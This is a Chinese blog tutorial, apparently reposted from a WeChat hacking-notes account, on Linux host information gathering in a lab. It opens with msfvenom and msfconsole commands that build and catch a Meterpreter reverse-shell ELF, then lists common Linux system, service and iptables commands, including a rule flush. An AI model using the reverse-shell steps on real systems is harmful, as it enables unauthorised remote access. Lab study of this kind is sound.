在前面的文章中,我们讲到了在windows下前期及后期的信息收集。本文我们来谈谈在Linux平台下的信息收集吧!
实验环境
-
Centos7 -
kali Linux
生成shell
我们首先里面msf来生成相关Linux平台下的可执行shell。命令如下:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.123.43 lport=5555 -f elf -o kali.elf
配置msf
msfconsole
handler -H 192.168.123.43 -P 5555 -p linux/x86/meterpreter/reverse_tcp
将生成的kali.elf上传到服务器。并添加可执行权限。
#添加权限
chmod +x kali.elf
#运行
./kali.elf
#后台运行
./kali.elf &
需要注意的是,在实际工作中,个人感觉Linux的安全性能相对来说比Windows要安全。即使将shell上传,没有root权限程序是无法运行的。当然还需要root权限来开启相应的端口。如下,我们运行程序后,成功得到会话信息。
在Linux中常用的命令
获取系统架构等信息
uname -a
进程相关
ps -elf // 列出当前进程快照
ps aux // 列出当前进程快照
top
服务状态
service --status-all // 检查所有服务状态
systemctl -a // 列出安装在文件系统中的所有单元.
service servicename start
systemctl start servicename // 启动某个服务
service servicename stop
systemctl stop servicename // 停止某个服务
service servicename status
systemctl status servicename // 显示某个服务状态信息
cat /etc/services // /etc/services将端口号映射到指定的服务
防火墙
iptables -L // 列出所有规则链。
iptables -F // 删除选定规则链中的所有规则.
iptables -A INPUT -p icmp -m icmp –icmp-type 0 -j ACCEPT // 请执行iptables -p icmp –help 获得更多信息.
iptables -A INPUT -p tcp -m tcp –sport 80 -m state –state RELATED,ESTABLISHED -j ACCEPT
// 允许来自src端口80的tcp连接
// -A 新增一条规则 , INPUT[入方向],OUTPUT[出方向]
// -p 协议类型
// -sport 源端口 -dport 目标端口
// -j 处理数据包的动作,ACCEPT 、DROP
iptables -A OUTPUT -p tcp -m tcp -dport 80 -m state –state NEW,RELATED,ESTABLISHED -j ACCEPT
// 允许 从/到 dst 端口80的TCP连接.
iptables -A INPUT -p udp -m udp –sport 53 -m state –state RELATED,ESTABLISHED -j ACCEPT
// 允许来自src端口80的udp连接
iptables -A OUTPUT -p udp -m udp –dport 53 -m state –state NEW,RELATED,ESTABLISHED -j ACCEPT
// 允许从/到 dst 端口53的udp连接.
iptables -A OUTPUT -p tcp -m tcp –sport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp –dport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
// 允许本地主机连接到 localhost:55552
// -s 原地址ip -d 目标地址ip
// -i 指定数据包从哪块网卡进入-o指定数据包从哪块网卡输出
其他的,我们就不在多少了。也可以利用msf进入Linux的shell环境。因为权限比较高,可以在shell中执行更多的操作。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):浅谈Linux主机信息收集
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论